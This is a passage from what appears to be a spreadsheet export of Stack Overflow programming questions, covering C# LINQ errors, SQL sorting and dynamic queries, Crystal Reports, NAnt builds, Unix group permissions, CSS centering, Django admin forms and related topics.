&lt;p&gt;I have experimented with loading the generated bytecode into the same ApplicationDomain as the private class (I use a child domain by default). I even tried registering a class alias before the load (though that was a bit of a stretch).&lt;/p&gt;
&lt;p&gt;Am I forgetting anything or is it simply a restriction of the AVM?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Please note that I am fully aware that this is illegal in ActionScript 3.0, I am looking for whether this is actually possible in the AVM.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; For those interested in the work so far, the project is &lt;a href="http://asmock.sourceforge.net/" rel="nofollow"&gt;asmock&lt;/a&gt; and is on sourceforge.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lambda "cannot be inferred from the usage"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following dictionary declared:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private readonly Dictionary&amp;lt;int, Image&amp;gt; dictionary;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I have a method, which is causing a compiler error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public IQueryable&amp;lt;Image&amp;gt; Find(Func&amp;lt;Image, bool&amp;gt; exp)
    {
        return  dictionary.Single(exp);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error i get is: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error   1	The type arguments for method 'System.Linq.Enumerable.Single&amp;lt;TSource&amp;gt;(System.Collections.Generic.IEnumerable&amp;lt;TSource&amp;gt;, System.Func&amp;lt;TSource,bool&amp;gt;)' cannot be inferred from the usage. Try specifying the type arguments explicitly.	C:\work\MSD-AIDS-Images\MSD-AIDS-Images-Test\TestImageRepository.cs	34	30	MSD-AIDS-Images-Test
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried googling around, I cant seem to find anything definitive as to what I am doing wrong&lt;/p&gt;
&lt;p&gt;Edit - This is monday morning at work.&lt;/p&gt;
&lt;p&gt;I meant to put "where", not single&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit 2!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ok, the code is now this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public IQueryable&amp;lt;Image&amp;gt; Find(Func&amp;lt;Image, bool&amp;gt; exp)
{
    return dictionary.Values.Where(exp);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error   1	Cannot implicitly convert type 'System.Collections.Generic.IEnumerable&amp;lt;MSD_AIDS_Images_Data.Image&amp;gt;' to 'System.Linq.IQueryable&amp;lt;MSD_AIDS_Images_Data.Image&amp;gt;'. An explicit conversion exists (are you missing a cast?)	C:\work\MSD-AIDS-Images\MSD-AIDS-Images-Test\TestImageRepository.cs	34	20	MSD-AIDS-Images-Test
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As an FYI, the method there is for implementing an interface, the declaration for that is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IQueryable&amp;lt;T&amp;gt; Find(Func&amp;lt;T, bool&amp;gt; exp);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This has got more complicated than it should be!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET best practices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know it is a broad topic but I'm interested in any of .NET's so-called best practices, though I'm looking for less obvious ones, unlike "use as instead of casting".&lt;br /&gt;
Let's see what interesting things I can learn from Stack Overflow users.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Query in SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with 10 columns as col_1,col_2,.... col_10. I want to write a select statement that will select a value of one of the row and from one of these 10 columns. I have a variable that will decide which column to select from. Can such query be written where the column name is dynamically decided from a variable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the "New ... With" syntax do in VB Linq?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What (if any) is the difference between the results of the following two versions of this VB Linq query?&lt;/p&gt;
&lt;p&gt;' assume we have an XElement containing employee details defined somewhere else&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim ee = From e In someXML.&amp;lt;Employee&amp;gt; _
Select New With {.Surname = e.&amp;lt;Surname&amp;gt;, .Forename = e.&amp;lt;Forename&amp;gt;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim ee = From e In someXML.&amp;lt;Employee&amp;gt; _
Select Surname = .Surname = e.&amp;lt;Surname&amp;gt;, .Forename = e.&amp;lt;Forename&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ie what is the point of the New ... With syntax?&lt;/p&gt;
&lt;p&gt;I suspect that this has a simple answer, but I can't find it - any links to suitable tutorials or Microsoft documentation would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>why windows allowed us to create a folder as "con"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i tried a lot to create a folder names as "con" , but it says the desired device name is not known.. can you tell me why this is happening?? thanks in advance&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duplicate of &lt;a href="http://stackoverflow.com/questions/448438/windows-and-renaming-folders-the-con-issue"&gt;Windows and renaming folders - the â€˜conâ€™ issue&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google App Engine Query (not filter) for children of an entity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are the children of an entity available in a Query?&lt;/p&gt;
&lt;p&gt;Given:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Factory(db.Model):
    """ Parent-kind """
    name = db.StringProperty()
class Product(db.Model):
    """ Child kind, use Product(parent=factory) to make """
    @property
    def factory(self):
        return self.parent()
    serial = db.IntegerProperty()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Assume 500 factories have made 500 products for a total of 250,000 products.  Is there a way to form a resource-efficient query that will return just the 500 products made by one particular factory?  The ancestor method is a filter, so using e.g. Product.all().ancestor(factory_1) would require repeated calls to the datastore.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do Strongly Typed Datasets improve performance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where I work we're &lt;em&gt;finally&lt;/em&gt; coming around to the idea of using strongly typed datasets to  encapsulate some of our queries to sqlserver. One of the idea's I've been touting is the strength of the strongly typed column's, mainly for not needing to cast any data. Am I wrong in thinking that strongly-typed-datasets would improve performance in the following situation where there could be potentially thousands of rows?&lt;/p&gt;
&lt;p&gt;old way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using(DataTable dt = sql.ExecuteSomeQuery())
{
    foreach (DataRow dr in dt.Rows)
    {
        var something = (string)dr["something"];
        var somethingelse = (int)dr["somethingelse"];
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;new way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyDataAdapter.Fill(MyDataset);
foreach (DataRow dr in MyDataset.MyDT.Rows)
{
    var something = dr.Something;
    var somethingelse = dr.SomethingElse;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the properties are really just doing the casting behind the scenes, I can see how there wouldn't be any speedup at all; perhaps it would take even longer then before with the overhead of the function call in the first place. &lt;/p&gt;
&lt;p&gt;Are there any other performance strengths / weaknesses of using DataSets we should know about?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio detaches from application as soon as debugging starts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web application that I've always been able to run in Visual Studio and it debugs just fine (breakpoints work, I can pause execution, etc). Recently, the behavior changed suddenly, and a few things happen:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I start debugging, it lauches IE and loads the application, but after a few seconds (sometimes the page hasn't even displayed yet), Visual Studio acts as if debugging has stopped - I'm able to edit code in VS again, and the "Play" button on the toolbar is enabled. The application continues to run in the IE window just spawned, but I'm not attached to it&lt;/li&gt;
&lt;li&gt;During this few seconds that VS is "debugging", because it detaches, my breakpoints show as hollow - as if I'm set to "Release" mode and they won't be hit. In fact, I have a breakpoint set in Page_Load, and it skips right by. I've checked, and I'm set to debug mode, though the compile mode dropdown is missing from my toolbar (I checked in the build properties to ensure I was in debug mode).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Can anybody shed some light here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What CSS properties can be applied to which HTML elements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a source/spec that can tell me what CSS properties can applied to which HTML elements.  For instance, the css property; "overflow".  I know I can apply this to div, p, textarea but what other elements can I apply this too?  Is there a spec somewhere I can reference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL sort by version "number", a string of varying length</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create an SQL query that will order the results by a version number (e.g. 1.1, 4.5.10, etc.)&lt;/p&gt;
&lt;p&gt;Here's what I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM Requirements 
    WHERE Requirements.Release NOT LIKE '%Obsolete%' 
    ORDER BY Requirements.ReqNum
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, the ReqNum field is a string field and unfortunately I can't change it to a float or something like that because I have requirement numbers like &lt;code&gt;162.1.11&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;When I get the results back, I'll get ordering like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1.1
1.10
1.11
1.3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;How can I write a query that will sort by lexicographic order?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;... or,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How can I correctly sort the data?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thanks for the input in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you set a directory to have persistent group permissions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have two users:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;user1&lt;/li&gt;
&lt;li&gt;user2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;They both belong to the group 'admin'.&lt;/p&gt;
&lt;p&gt;We have a directory that has been set to 775.  The directory's group has been changed to 'admin'.  Each user has full access to write into that directory, though when a user writes a new file to the directory, the group permissions of the folder are not persisted to the file that was written.&lt;/p&gt;
&lt;p&gt;How should we make it so that files inherit the directory's group permissions?&lt;/p&gt;
&lt;p&gt;Clarification: when a new file or directory is written, it uses the users' group as the group of the new file, rather than that of the directory, which makes sense - but how do I not make that happen?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to embed Firebird Installation in the Installer for my app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My app has its own installer but I have to guide my users to install Firebird on their own.&lt;/p&gt;
&lt;p&gt;I'd like to install it automatically.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parameter Problem with Crystal Reports Export</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to export a crystal report to pdf and then email it, but every time I get to the export command, I get a ParameterFieldCurrentValue exception.&lt;/p&gt;
&lt;p&gt;I've traced the values of the Parameter collection in the ReportDocument and the values are being set there. Also, all four parameters are strings. The first one is set to allow more than one value and also either discrete or range values. The dialog I call sets values for the choosable selections for that parameter. There are no other parameter fields. There are formula fields, in the report however.&lt;/p&gt;
&lt;p&gt;My code is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SelectionDialog sd = new SelectionDialog(null, null, 
@"\\er1\common\bfi_apps\ReportMasterTwo\eds\custno.csv", true, false);
DialogResult dr = sd.ShowDialog();
string filename = @"c:\documents and settings\aap\desktop\salesanalysis.pdf";
if (dr == DialogResult.OK &amp;amp;&amp;amp; sd.selectedVals != null)
{
    for (int i = 0; i &amp;lt; sd.selectedVals.Count; i++)
    {
        ar100SalesABC_edcustom1.Parameter_Customer_Number.CurrentValues.AddValue
    (sd.selectedVals[i]);
    }
    ar100SalesABC_edcustom1.Parameter_Fiscal_period.CurrentValues.AddValue("1");
    ar100SalesABC_edcustom1.Parameter_Fiscal_year.CurrentValues.AddValue("2007");
    ar100SalesABC_edcustom1.Parameter_Product_Type.CurrentValues.AddValue("F");
    ar100SalesABC_edcustom1.ExportToDisk
    (ExportFormatType.PortableDocFormat, filename); // ERROR HAPPENS HERE
    // .. emailing code and other stuff
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I doing wrong? Is there some other way of doing this that is better? I have tried export options, I have tried SetParameter, I keep getting that error.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change Properties.settings for a .net deployed application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Hi All,&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have two .net applications, these applications want to talk to each other, I made a setting in  the first project as follows&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[CompilerGeneratedAttribute()]
[GeneratedCodeAttribute("SettingsSingleFileGenerator", "9.0.0.0")]
public sealed partial class Settings :ApplicationSettingsBase 
{
        [UserScopedSettingAttribute()]
        [DebuggerNonUserCodeAttribute()]
        [DefaultSettingValueAttribute("False")]
        public bool BeginWorking {
            get {
                return ((bool)(this["BeginWorking"]));
            }
            set {
                this["BeginWorking"] = value;
            }
        }
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute("False")]
        public bool Result {
            get {
                return ((bool)(this["Result"]));
            }
            set {
                this["Result"] = value;
            }
        }
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute("False")]
        public bool Completed{
            get {
                return ((bool)(this["Completed"]));
            }
            set {
                this["Completed"] = value;
            }
        }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the second project may set the BeginWorking setting for the first project in order to tell it to work, and waits for the Completed setting to be set and get the result from the Result setting.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is that possible and how??&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I feel it may be not easy to answer but excuse me I'm get unable to think more.&lt;/p&gt;
&lt;p&gt;Thanks All&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What happened to types.ClassType in python 3?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a script where I do some magic stuff to dynamically load a module, and instantiate the first class found in the module. But I can't use &lt;code&gt;types.ClassType&lt;/code&gt; anymore in Python 3. What is the correct way to do this now?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you force the System.Net.Socket.Connect() method to use a socks proxy (code injection vs external custom proxy)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using WCF's netTcpBinding, which connects directly to an endpoint and doesn't seems to know anything about socks proxies.&lt;/p&gt;
&lt;p&gt;I need to use a proxy because most of my clients won't allow direct outbound connections, and enforce the use of socks proxies at all times.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;My first idea was to configure the .net framework to do that, so I edited the machine.config file as follows, but it seems it only works with http proxies (not socks)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;system.net&amp;gt;
&amp;lt;defaultProxy enabled="true"&amp;gt;
  &amp;lt;proxy usesystemdefault="False" proxyaddress="foo:1080" bypassonlocal="True"/&amp;gt;
  &amp;lt;module /&amp;gt;
&amp;lt;/defaultProxy&amp;gt;
&amp;lt;/system.net&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;My second option was to implement a custom binding inheriting from netTcpBinding, and only overriding the connection logic to add the proxy code.&lt;/p&gt;
&lt;p&gt;I've dissasembled the System.ServiceModel assembly, and unfortunately, a lot of classes are marked as internal (including SocketConnectionInitiator, ConnectionPoolHelper, ClientFramingDuplexSessionChannel and FramingDuplexSessionChannel, and probably others aswell)&lt;/p&gt;
&lt;p&gt;This makes creating a custom netTcpBinding a huge work, and moreover could cause some problems as new versions of the .net framework are delivered.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Another idea is to inject some code directly into the Socket.Connect() method. This is quite easy to achieve, but I'm not very confident with modifying the inner code of the .net framework. Also, although the socket class isn't marked as sealed, I'm afraid of breaking something, especially in later relases of the framework.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Last idea I've got for now: I could create a little proxy tool, running on the same computer as my software, which would automatically connect to the corporate's socks proxy, and issue the good "connect server" command to the real socks proxy. &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The latter option is in my opinion the better, but I'm curious to hear other people opinions.&lt;/p&gt;
&lt;p&gt;What do you think?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Crystal Reports Subreport Using DataSets</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use Crystal Reports XI with C# Visual Studio 2005.
I am trying to create a subreport from a summary dataset.
A simple example would be Company listing with Employees.
I load the Company dataset (with CompanyId).
I want to create a subreport which is linked by CompanyId whereby the dataset is loaded (obviously) on demand.  I can create this subreport if I load all the detail into one monster dataset, but in my real-world implementation this would involve loading millions of detail rows (not an option).&lt;/p&gt;
&lt;p&gt;Is there a way I can capture the SubReport event and load the dataset from my database connection?  I basically want to intercept the subreport link call to build the dataset myself.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In NAnt, can I create a fileset of the files listed in a VS project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm rewriting our &lt;a href="http://nant.sourceforge.net/" rel="nofollow"&gt;NAnt&lt;/a&gt; build scripts to make them cleaner and simpler, as well as more general purpose.  &lt;/p&gt;
&lt;p&gt;One of the steps in our build process is to package certain files into a zip file.  Before we had created a &lt;a href="http://nant.sourceforge.net/release/latest/help/types/zipfileset.html" rel="nofollow"&gt;&lt;code&gt;fileset&lt;/code&gt;&lt;/a&gt; with lots of included file types, trying to catch everything that might be in the project.  This occasionally caused problems when we wanted to include a non-standard file type with the project.&lt;/p&gt;
&lt;p&gt;I was hoping that I could find a way to create a &lt;a href="http://nant.sourceforge.net/release/latest/help/types/zipfileset.html" rel="nofollow"&gt;&lt;code&gt;fileset&lt;/code&gt;&lt;/a&gt; based on the files (and, also, a &lt;em&gt;subset&lt;/em&gt; of the files) listed in the Visual Studio project file (.csproj).  I could then use this fileset in a &lt;a href="http://nant.sourceforge.net/release/latest/help/tasks/zip.html" rel="nofollow"&gt;&lt;code&gt;zip&lt;/code&gt;&lt;/a&gt; task.  I haven't found anything that does this automatically (though the now-deprecated &lt;a href="http://nantcontrib.sourceforge.net/release/latest/help/tasks/slingshot.html" rel="nofollow"&gt;&lt;code&gt;SLiNgshoT&lt;/code&gt;&lt;/a&gt; task in &lt;a href="http://nantcontrib.sourceforge.net/" rel="nofollow"&gt;NAntContrib&lt;/a&gt; looked a little promising).&lt;/p&gt;
&lt;p&gt;I started down the path of trying to do this manually, but have gotten stuck.  I have a target that gets the project from the solution (using &lt;a href="http://nant.sourceforge.net/release/latest/help/tasks/regex.html" rel="nofollow"&gt;&lt;code&gt;regex&lt;/code&gt;&lt;/a&gt;), then tries to get each Content file in the project using &lt;a href="http://nant.sourceforge.net/release/latest/help/tasks/xmlpeek.html" rel="nofollow"&gt;&lt;code&gt;xmlpeek&lt;/code&gt;&lt;/a&gt; (with the XPath query &lt;code&gt;/n:Project/n:ItemGroup/n:Content/@Include&lt;/code&gt;).  The problem here is that &lt;a href="http://nant.sourceforge.net/release/latest/help/tasks/xmlpeek.html" rel="nofollow"&gt;&lt;code&gt;xmlpeek&lt;/code&gt;&lt;/a&gt; doesn't return every value, just the first.  And, even if it did return every value, I'm not sure how I'd get it into a &lt;a href="http://nant.sourceforge.net/release/latest/help/types/zipfileset.html" rel="nofollow"&gt;&lt;code&gt;fileset&lt;/code&gt;&lt;/a&gt; from here.&lt;/p&gt;
&lt;p&gt;Is there any way to salvage this track of thinking?  Can I accomplish what I want with a custom NAnt task (I'd prefer not to have every project dependent on a custom task)?  Is there some built-in way to do this that I'm not finding?&lt;/p&gt;
&lt;p&gt;Please feel free to ask questions in the comments if something about my goal or method isn't clear.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; To clarify, my point in all of this is to make the whole process much more seamless.  While I can easily add all .xml files to a package, this often gets .xml files that live in the same folder but aren't really part of the project.  When I already have a list of the files that the project uses (separated out between Content and other types, even), it seems a shame not to use that information.  Ultimately, no one should have to touch the build file to change what gets included in a package.  It doesn't seem like too much of a pipe dream to me...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get ctags to pick up functions in a .h file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Exuberant Ctags 5.7.  I am trying to build a tag database for CGContext.h with:&lt;/p&gt;
&lt;pre&gt;
tags /System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Headers/CGContext.h
&lt;/pre&gt;
&lt;p&gt;The resulting tags file has no functions included in it.  It only has 75 lines for types, and enums.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Including a service reference from a class library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# class library and a startup project (a console app). The class library includes a service reference to a web service. When I try to run the project, I get an InvalidOperationException because the startup project isn't reading the class library's app.config, and it's ignoring the service reference. To get it working, I'm forced to add the same service reference to the startup project. Is there any way I can avoid this? Can I make the startup project recognize the class library's service reference and app.config without having to copy it to the startup project?&lt;/p&gt;
&lt;p&gt;I've tried adding a link to the app.config from the class library, but that doesn't work. The class library isn't very portable if it requires anyone who uses it to add that service reference to the startup project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dead Center for JavaScript Output</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm going to apologize in advance for how basic this question is, but this is my first time using javascript in html.. &lt;/p&gt;
&lt;p&gt;Basically, I have a javascript that produces a different bit of random text every time a user loads the page.  I'd like to format that text in helvetica and then display it centered in the middle of the page.  I'm attempting to do this with css as indicated below, but it is not working for me.  Any suggestions much appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HTML&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;head&amp;gt;
&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&amp;gt;
&amp;lt;title&amp;gt;home&amp;lt;/title&amp;gt;
&amp;lt;link href="style.css" rel="stylesheet" type="text/css" /&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div id="horizon"&amp;gt;
&amp;lt;div id="content"&amp;gt;
&amp;lt;script type="text/javascript" src="scripts.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;CSS&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#horizon 
{
color: white;
background-color: #ffffff;
text-align: center;
position: absolute;
top: 50%;
left: 0px;
width: 100%;
height: 1px;
overflow: visible;
visibility: visible;
display: block
}
 #content 
{
font-family: Helvetica, Geneva, Arial, sans-serif;
font-color: black;
background-color: white;
margin-left: -410px;
position: absolute;
top: -237px;
left: 50%;
width: 825px;
height: 475px;
visibility: visible
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Parameter vs. Member variables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently been working with someone else's code and I realized that this individual has a very different philosophy regarding private variables and method parameters than I do.  I generally feel that private variables should only be used in a case when:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The variable needs to be stored for recall later.&lt;/li&gt;
&lt;li&gt;The data stored in the variable is used globally in the class.&lt;/li&gt;
&lt;li&gt;When the variable needs to be globally manipulated (something decidedly different from the need to read the variable by every class method).&lt;/li&gt;
&lt;li&gt;When it will make programming substantially easier. (Admittedly vague, but one has to be in many circumstances to avoid painting oneself into a corner).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;(I admit, that many of the above are slightly repetative, but they each seem different enough to merit such treatment... )&lt;br /&gt;&lt;br /&gt;
It just seems that this is the most efficient means of preventing changing a variable by accident.  It also seems like following these standards will allow for the eventual manipulation of external references (if the class is eventually modified), thus leaving you with further options in the future.  Is this simply a style issue (like one true bracket or Hungarian naming conventions), or do I have justification in this belief?  Is there actually a best practice in this case?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;edit&lt;/strong&gt;&lt;br /&gt;
I think this needs to be corrected.  I used "globally" above where I actually meant, "globally by instance methods" not "globally accessible by anything, anywhere".&lt;br /&gt;&lt;br /&gt;
&lt;strong&gt;edit2&lt;/strong&gt;&lt;br /&gt;
An example was asked for:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class foo
{
    private $_my_private_variable;
    public function __constructor__()
    {
     }
    public function useFoo( $variable )
    {
        // This is the line I am wondering about,
        // there does not seem to be a need for storing it.
        $this-&amp;gt;_my_private_variable = $variable; 
        $this-&amp;gt;_doSometing();
    }
    private function _doSomething()
    {
        /*
          do something with $this-&amp;gt;_my_private_variable.
        */
        // This is the only place _my_private_variable is used.
        echo $this-&amp;gt;_my_private_variable;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the way I would have done it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class foo
{
    public function __constructor__()
    {
     }
    public function useFoo( $variable )
    {
        $this-&amp;gt;_doSometing( $variable );
    }
    private function _doSomething( $passed_variable )
    {
        /*
          do something with the parameter.
        */
        echo $passed_variable;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Do Python regexes support something like Perl's \G?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Perl regular expression (shown &lt;a href="http://stackoverflow.com/questions/529657/how-do-i-write-a-regex-that-performs-multiple-substitutions-on-each-line-except/529735#529735"&gt;here&lt;/a&gt;, though understanding the whole thing isn't hopefully necessary to answering this question) that contains the \G metacharacter. I'd like to translate it into Python, but Python doesn't appear to support \G. What can I do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MDX Calculating Time Between Events</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Cube which draws its data from 4 fact/dim tables. &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;FactCaseEvents (EventID,CaseID,TimeID)&lt;/code&gt;  &lt;/li&gt;
&lt;li&gt;&lt;code&gt;DimEvents (EventID, EventName)&lt;/code&gt;  &lt;/li&gt;
&lt;li&gt;&lt;code&gt;DimCases (CaseID,StateID,ClientID)&lt;/code&gt;  &lt;/li&gt;
&lt;li&gt;&lt;code&gt;DimTime (TimeID,FullDate)&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Events would be: &lt;code&gt;CaseReceived,CaseOpened,CaseClientContacted,CaseClosed&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;DimTime holds an entry for every hour.&lt;/p&gt;
&lt;p&gt;I would like to write an MDX statement that will get me 2 columns: "&lt;code&gt;CaseRecievedToCaseOpenedOver5&lt;/code&gt;" and "&lt;code&gt;CaseClientContactedToCaseClosedOver5&lt;/code&gt;"&lt;/p&gt;
&lt;p&gt;&lt;code&gt;CaseRecievedToCaseOpenedOver5&lt;/code&gt; would hold the number of cases that had a time difference over 5 hours for the time between &lt;code&gt;CaseReceived&lt;/code&gt; and &lt;code&gt;CaseOpened&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I'm guessing that "&lt;code&gt;CaseRecievedToCaseOpenedOver5&lt;/code&gt;" and "&lt;code&gt;CaseClientContactedToCaseClosedOver5&lt;/code&gt;" would be calculated members, but I need some help figuring out how to create them.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Images -&gt; byte arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I am importing some images stored in SQL image columns, and I need to change them to Byte arrays since I store my images as varbinary(max) and recreate them. I would LOVE it if there was a program to do this, or a really easy way since I don't have a ton of time. &lt;/p&gt;
&lt;p&gt;Any ideas out there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django - How to prepopulate admin form fields</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that you can prepopulate admin form fields based on other fields. For example, I have a slug field that is automatically populated based on the title field.&lt;/p&gt;
&lt;p&gt;However, I would also like to make other automatic prepopulations based on the date. For example, I have an URL field, and I want it to automatically be set to &lt;a href="http://example.com/20090209.mp3" rel="nofollow"&gt;http://example.com/20090209.mp3&lt;/a&gt; where 20090209 is YYYYMMDD. &lt;/p&gt;
&lt;p&gt;I would also like to have a text field that automatically starts with something like "Hello my name is author" where author is the current user's name. Of course, I also want the person to be able to edit the field. The point is to just make it so the user can fill out the admin form more easily, and not just to have fields that are completely automatic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActionMailer problem- what is the correct syntax for sending PDF attachments</t>
